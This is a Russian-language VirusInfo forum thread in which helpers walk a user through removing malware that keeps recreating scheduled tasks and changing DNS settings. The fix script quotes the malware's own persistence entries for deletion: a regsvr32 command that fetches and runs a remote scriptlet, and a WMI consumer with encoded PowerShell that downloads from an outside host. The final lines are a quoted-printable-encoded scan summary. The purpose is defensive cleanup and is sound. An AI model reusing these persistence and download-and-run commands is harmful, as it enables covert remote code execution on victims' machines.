В планировщике появляются задачи. Провайдер жалуется на сетевую активность. Прошу помочь.
Printable View
В планировщике появляются задачи. Провайдер жалуется на сетевую активность. Прошу помочь.
Уважаемый(ая) [B]maker812[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Сделайте лог [url="http://support.kaspersky.ru/5350"]TDSSkiller[/url]
Готово
Теперь делайте новые логи Autologger.
[QUOTE=thyrex;1504946]Теперь делайте новые логи Autologger.[/QUOTE]
готово
Выполните скрипт в AVZ из папки Autologger
[code]begin
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('c:\windows\debug\ok.dat','');
QuarantineFile('c:\windows\debug\item.dat','');
TerminateProcessByName('c:\windows\update.exe');
QuarantineFile('c:\windows\update.exe','');
TerminateProcessByName('c:\windows\system\msinfo.exe');
QuarantineFile('c:\windows\system\msinfo.exe','');
TerminateProcessByName('c:\windows\syswow64\csrs.exe');
QuarantineFile('c:\windows\syswow64\csrs.exe','');
DeleteFile('c:\windows\syswow64\csrs.exe','32');
DeleteFile('c:\windows\system\msinfo.exe','32');
DeleteFile('c:\windows\debug\item.dat','32');
DeleteFile('C:\Windows\system32\Tasks\Mysa','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa1','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa2','64');
DeleteFile('C:\Windows\system32\Tasks\Mysa3','64');
DeleteFile('C:\Windows\system32\Tasks\ok','64');
DeleteFile('c:\windows\debug\ok.dat','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
end.[/code][list][*]Обратите внимание: [b]перезагрузку компьютера[/b] нужно выполнить вручную после скрипта.[/list]
Выполните скрипт в AVZ
[code]begin
CreateQurantineArchive('c:\quarantine.zip');
end.[/code][b]c:\quarantine.zip[/b] пришлите по красной ссылке [color="Red"][u][b]Прислать запрошенный карантин [/b][/u][/color] [b]над первым сообщением[/b] темы.
[b][color="Red"]Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи. [/color][/b]
готово
Скачайте [url=https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]https://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[list][*][b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.[/list]
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.
2. Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]List BCD[/i] и [i]90 Days Files[/i].
[img]https://i.imgur.com/3munStB.png[/img]
3. Нажмите кнопку [b]Scan[/b].
4. После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет ([b]Addition.txt[/b]).
6. Файлы [b]FRST.txt[/b] и [b]Addition.txt[/b] заархивируйте (в [b]один общий архив[/b]) и прикрепите к сообщению.
логи загружены
1. Выделите следующий код:
[code]
Start::
CreateRestorePoint:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.0603bye.info:280/v.sct scrobj.dll <==== ATTENTION
Task: {65DE6951-6313-424C-9D62-976402FBDB25} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b1c3139c-124b-46b9-bbee-cc51dd181c66} <==== ATTENTION (Restriction - IP)
2019-10-03 19:45 - 2019-10-03 19:45 - 000003186 _____ C:\Windows\system32\Tasks\ok
2019-10-03 17:54 - 2019-02-27 15:35 - 000000084 _____ C:\Program Files\Common Files\xpwpd.dat
2019-10-03 17:53 - 2019-02-27 23:10 - 000000081 _____ C:\Windows\system32\s
2019-10-03 17:53 - 2019-02-27 23:10 - 000000079 _____ C:\Windows\system32\ps
2019-10-03 17:53 - 2019-02-27 23:10 - 000000077 _____ C:\Windows\system32\p
2019-03-02 14:31 - 2019-03-02 14:31 - 000662528 _____ (Zhuhai Kingsoft Office Software Co.,Ltd) C:\Windows\update.exe
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->fuckyoumm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 661 more characters).] <==== ATTENTION
End::
[/code]
2. Скопируйте выделенный текст ([b]правая кнопка мыши[/b] – [b]Копировать[/b]).
3. Запустите [b]Farbar Recovery Scan Tool[/b].
4. Нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении.
[list][*]Обратите внимание: [b]перезагрузку компьютера[/b] нужно выполнить вручную после данного скрипта.[/list]
лог
Проблема решена?
После установки обновлений и перезапуска в планировщике снова появились задачи и были заменены адреса DNS 223.5.5.5 и 8.8.8.8.
К сообщению прикреплен лог
Еще раз сделайте лог TDSSkiller
лог tdsskiller
Компьютер перезагрузили?
Да, перезагрузил
Сделайте новые логи Autologger
=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
[LIST][*]=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: [B]1[/B][*]=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: [B]5[/B][*]=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
[LIST=3D1][*] c:\windows\debug\item.dat - [B]UDS:DangerousObject.Multi.Generi=
c[/B] ( AVAST4: Win32:Trojan-gen )[*] c:\windows\debug\ok.dat - [B]UDS:DangerousObject.Multi.Generic[=
/B] ( AVAST4: Win32:Trojan-gen )[*] c:\windows\system\msinfo.exe - [B]UDS:DangerousObject.Multi.Gen=
eric[/B] ( AVAST4: Win32:Trojan-gen )[*] c:\windows\syswow64\csrs.exe - [B]Trojan.Win64.Shelma.alw[/B] (=
AVAST4: Win32:Evo-gen [Susp] )[*] c:\windows\update.exe - [B]UDS:Trojan.Win32.Generic[/B] ( AVAST4=
: Win32:Malware-gen )[/LIST][/LIST]